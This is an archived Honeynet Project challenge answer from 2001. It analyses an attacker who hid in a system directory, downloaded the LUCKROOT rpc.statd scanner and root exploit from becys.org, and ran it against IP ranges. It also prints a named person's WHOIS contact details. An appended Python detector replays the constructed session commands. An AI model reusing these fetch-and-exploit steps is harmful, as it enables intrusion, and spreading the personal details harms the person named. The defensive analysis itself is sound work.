From CARL.DONALDSON@ca.com Sat Mar 17 19:44:29 2001
Date: Fri, 2 Mar 2001 10:51:41 -0000
From: "Donaldson, Carl"
To: project@honeynet.org
Subject: Scan 13

The Challenge:

1. What is the blackhat attempting to do with his command line syntax?
2. What does the tool accomplish?
3. How does the tool work?
4. Is this tool a worm, or would you classify it as something else?
5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

Bonus Question:

6. What information can you obtain about who is using or created the tool?

Answer

Analysis of the attack

a) The attacker changes his working directory to the /usr/sbin/.mail directory, a hidden directory on the system.

b) He then uses the Lynx application to download a tarred file called LUCKROOT.TAR from the website www.becys.org.

c) The attacker runs the command "tar -xvfz LUCKROOT.TAR", which breaks down as "tar -extract -verbose -file -gzip LUCKROOT.TAR". This fails because the switch order is wrong.

d) The attacker tries to run the tar command with the switches in the correct order, but in his haste he types a lowercase u for the filename, which fails to complete with a tab key press and causes the command to fail.

e) The attacker tries again, but only enters an uppercase L. It is possible there is another file or directory in the .mail directory which causes the auto complete to fail.

f) The attacker enters the command with the switches in the correct order and the correct file name. The LUCKROOT.tar file extracts and expands into a directory called /usr/sbin/.mail/luckroot/

g) The 5 files extracted are luckstatdx, luckstatdx.c, luckgo, luckscan-a, & luckscan-a.c.

h) The attacker starts running the luckgo script, which is an automated rpc.statd vulnerability scanner & exploit. The numbers entered after the command "luckgo" are ip address ranges which the scanner should attempt to scan & exploit.

g) The LUCKROOT tool isn't a worm as its spread isn't completely automated. The tool is a combined rpc.statd vulnerability scanner & exploit which scans large IP address ranges & runs the statd exploit. The exploit allows commands to be run as root on the remote system.

h) The luckgo script is a shellscript to tie the scanner & exploit into one easy package.

i) The luckstatdx.c code is probably based on the statdx.c code by ron1n (http://packetstorm.securify.com/0008-exploits/statdx.c). The statdx code has been modified by becys to download & install a package called xzibit.tar.gz from www.becys.org once the system has been compromised. He's also removed the headers and changed some of the messages.

j) Luckscan-a is modified code based on the pscan.c code by Volatile contained in the statdx-scan package (http://packetstorm.securify.com/UNIX/scanners/statdx-scan.tar.gz).

The tool's author uses the name becys in the code modifications & the tools are downloaded from the web site www.becys.org. The DNS registration information for the becys.org domain is as follows:

Becys.org
bSoft
1 Hensel Dr. Apt.#Z1F
College Station, Texas 77840
US

Domain Name: BECYS.ORG

Administrative Contact:
Qian Wang becys@yahoo.com
bSoft
1 Hensel Dr. Apt.#Z1F
College Station, Texas 77840
US
Phone- (979)862-9233
Fax-

Technical Contact:
Web Site Source, In info@websitesource.com
Web Site Source, Inc.
2476 Bolsover, Suite 484
Houston, TX 77005-2518
US
Phone- 713-667-2520
Fax- 800-863-6499

This information provides useful points of contact for further investigation. The IP address of the server www.becys.org is registered to Alabanza, a web hosting company in Baltimore. Alabanza publish an acceptable use policy on their website which specifically prohibits hacker tools.
thanks

Carl Donaldson
Computer Associates Consultant
tel: +44 (0)161 928 9334
fax: +44 (0)161 941 3775
mobile: +44 (0)7801 456925
carl.donaldson@ca.com
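As an added example, not part of Carl Donaldson's submission or of the LUCKROOT package: a small session-log classifier that flags the pattern the write-up describes (entering a hidden dot-directory under a system path, fetching an archive there, extracting it, then launching something from it). The session lines are constructed from the steps above; the exact lynx syntax and the luckgo arguments are assumptions, not the real keystroke log.

```python
import re
from typing import List, Tuple

# Constructed session modelled on steps a) to h) of the write-up (not the real log).
SESSION = [
    "cd /usr/sbin/.mail",
    "lynx -source http://www.becys.org/LUCKROOT.TAR > LUCKROOT.TAR",
    "tar -xvfz LUCKROOT.TAR",
    "tar -xvzf LUCKROOT.TAR",
    "cd luckroot",
    "./luckgo 10 11",  # constructed arguments; the page gives only "ip address ranges"
]

SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/lib", "/etc", "/dev")
FETCHERS = ("lynx", "wget", "curl", "ftp")
ARCHIVE_RE = re.compile(r"\S+\.(?:tar|tar\.gz|tgz)\b", re.IGNORECASE)

def hidden_under_system_dir(path: str) -> bool:
    """True for paths such as /usr/sbin/.mail: a dot-directory inside a system tree."""
    in_system = any(path == d or path.startswith(d + "/") for d in SYSTEM_DIRS)
    has_dot_component = any(p.startswith(".") for p in path.split("/") if p)
    return in_system and has_dot_component

def classify_session(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (line, reason) for each suspicious line, tracking cwd across 'cd'."""
    findings: List[Tuple[str, str]] = []
    cwd = "/"
    in_hidden = False
    for line in lines:
        argv = line.split()
        if not argv:
            continue
        cmd = argv[0]
        if cmd == "cd" and len(argv) > 1:
            target = argv[1]
            cwd = target if target.startswith("/") else cwd.rstrip("/") + "/" + target
            in_hidden = hidden_under_system_dir(cwd)
            if in_hidden:
                findings.append((line, f"entered hidden directory under system path: {cwd}"))
        elif cmd in FETCHERS and ARCHIVE_RE.search(line):
            findings.append((line, "archive downloaded with a command-line fetcher"))
        elif cmd == "tar" and in_hidden:
            findings.append((line, f"archive extracted inside hidden directory {cwd}"))
        elif cmd.startswith("./") and in_hidden:
            findings.append((line, f"executable launched from hidden directory {cwd}"))
    return findings

if __name__ == "__main__":
    for line, reason in classify_session(SESSION):
        print(f"{reason:60s} <- {line}")
```

Every line of the constructed session is flagged, including the failed "tar -xvfz" attempt, since a defender cares that the extraction was attempted in a hidden system directory, not whether it succeeded.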